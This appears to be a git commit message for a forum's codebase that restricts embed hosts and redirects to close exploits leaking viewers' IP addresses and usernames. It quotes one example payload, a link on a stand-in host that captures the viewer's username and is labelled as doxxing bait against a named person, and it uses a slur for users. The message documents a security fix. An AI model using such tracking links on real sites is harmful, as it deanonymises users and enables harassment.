Unlike the recent auto-embed exploits which have been patched, this
requires active user action. However our userbase, like all userbases,
contains quite a few retards and phoneposters who don't check links
before clicking.
Example exploit:
<a href="https://example.com/log?username=!YOU!">Bardfinn Dox</a>
Probably will break some peoples' profilecss and irritate the
newsposters, but in light of recent live proven exploits to disclose
user IP & username pairs to remote servers, the broad list of embed
hosts was unsustainable and impossible to prove safe.
We extend is_safe_url to allow whitelisting subdomains, specifically
to solve the s.lain.la open redirect exploit. Also, open media proxies
like external-content.duckduckgo.com were concerning enough, despite
likely being safe, to warrant removal. Anything infrequently used and
difficult to review, or has a reasonable alternative, was also removed.
In general: we want people to be rehosting, and if we want to allow
more external content, we need to run a media proxy. The central issue
is that any user-configurable 302 is a potential disclosure risk, and
Lord knows how many ways there were to get <arbitrarynewssite>.com to
do so. Maybe zero, but the problem is we just don't know.
!YOU! + an escape for `approved_embed_hosts` could let you grab the IP and username of everyone who views your comment
https://rdrama.net/post/129053/you-callout-thread/3191218?context=8#context
lain.la has a URL shortener that also works to get around embed hosts, fwiw
Co-authored-by: float trip <float-trip@rdrama.net>
Reviewed-on: #49
Co-authored-by: float-trip <float-trip@noreply.fsdfsd.net>
Co-committed-by: float-trip <float-trip@noreply.fsdfsd.net>
Aevann1
Snakes
SneedBot
float-trip